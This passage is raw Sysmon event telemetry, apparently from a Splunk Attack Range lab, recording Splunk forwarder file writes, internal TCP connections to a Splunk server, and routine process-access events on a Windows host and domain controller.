Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C4AB6AB912804F5A3235E06879A63F7,SHA256=EB0F030F3CE623362BB703C18363FE1F4C3565A61CAC9803D412D7C151085C03,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808624Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:17.978{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7FDF546CD3D93F803A44B344338570E,SHA256=19EF6D55CF990BA1716C47EC507F200001544FF530CC1EE959CD723A8683BFBC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051641Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:17.002{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08A221D5C7CEBA83E78778F17D211968,SHA256=BE4274D5F7A5B791755E324CADDBE2E1C8FFE0A2CE4AB4F69C865D7B3866C06A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051643Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:18.370{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051642Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:18.020{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED97C9B7D2389BBEE023BA549680150F,SHA256=203D23BF904FCFC472D7812A585CA9AFD04CA5DF25B401259142A54229CA622D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808625Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:58:17.188{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57342-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001051644Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:19.038{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8DA7F5DB66DBED65BDA1FE1B82E537B,SHA256=7521253E7FCD8AEB117179D797D0FB8F833729655D63586FD0AF80CC6F356D00,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808626Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:19.025{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98A4ADD6AEA26E7F9513B50A53349237,SHA256=364F47BD41BB6B3243C22793EDD2693D33B2EBDFC9768A31BD73B46C646820E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808628Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:20.650{0C1E0330-050B-60E8-9B00-00000000D001}1020NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808627Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:20.040{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AFAC3A699F653825DC638A86729D3D1B,SHA256=9B8B0245794ABA75F4B08C794356BF8F992CDAE53224653DDC748BE3F442D852,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051646Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:12.574{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51110-false10.0.1.12-8000- 23542300x80000000000000001051645Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:20.053{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0ABC6D9D873EC999F49A3A6D8DAAA8FA,SHA256=AA81A734161EB72B1DF45F13FA7DB5AE58A4B19A11B4B6A18BA7D0168053BF95,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051647Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:21.068{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B3F7376327103E1075EFB7FA5C7C674,SHA256=92888EA534C0154DEA3F25A85DF06933DA00527ABD85457EE5AF7B50E3DBC685,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808629Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:21.056{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B49E5F14ECF900E7A2186C86510331D,SHA256=AEBA3251922DE553CF514651AE77F0AA8608B5A09A4DF9163B771E55A9C7269C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051648Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:22.083{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8152F84FA20A85DD9A3E280D60D5D999,SHA256=4D04DD5D584B8784D6E4A76DCAD421C4877F92B4F5D980A3EC4FF9F850511727,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808631Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:20.782{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57343-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000808630Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:22.071{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0444BC1B96DFA52FEFDE8605893EFD9F,SHA256=7FE9E1EDF27AB305EE21004B8B9813542C1C59CFB0970C4DFAB9565E379EE90C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051649Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:23.117{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8B79030DE60437AD8D636B4B8E458B7,SHA256=11B7485F669CF03267C82AC3F2FEB2255D75599E48F8F1736BBAB6677E498E4D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808633Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:22.360{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57344-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808632Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:23.071{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=472B8221E481086BD4BECFF43EE1F665,SHA256=922A4876A8C0D7CDA83DA03A766AE538D6B645B3B38F966562AA5E9270FD2A23,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051650Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:24.136{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD35F915C6150769F370E7880882FA4E,SHA256=FDD2521E7BCC844560CAAA3E0A24D4058E13C7FC7F96D9B432C2F9EC45EF5296,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000808661Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:24.993{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F620-60EB-9E79-00000000D001}940C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808660Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:24.993{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808659Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:58:24.993{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808658Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:24.993{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808657Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:58:24.993{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808656Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:24.993{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808655Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:58:24.993{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808654Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:24.993{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808653Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:58:24.978{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808652Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:24.978{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808651Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:58:24.978{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F620-60EB-9E79-00000000D001}940C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808650Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:24.978{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F620-60EB-9E79-00000000D001}940C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808649Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:24.978{0C1E0330-F620-60EB-9E79-00000000D001}940C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000808648Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:24.509{0C1E0330-F620-60EB-9D79-00000000D001}3996828C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808647Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:24.337{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F620-60EB-9D79-00000000D001}3996C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808646Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:58:24.337{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808645Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 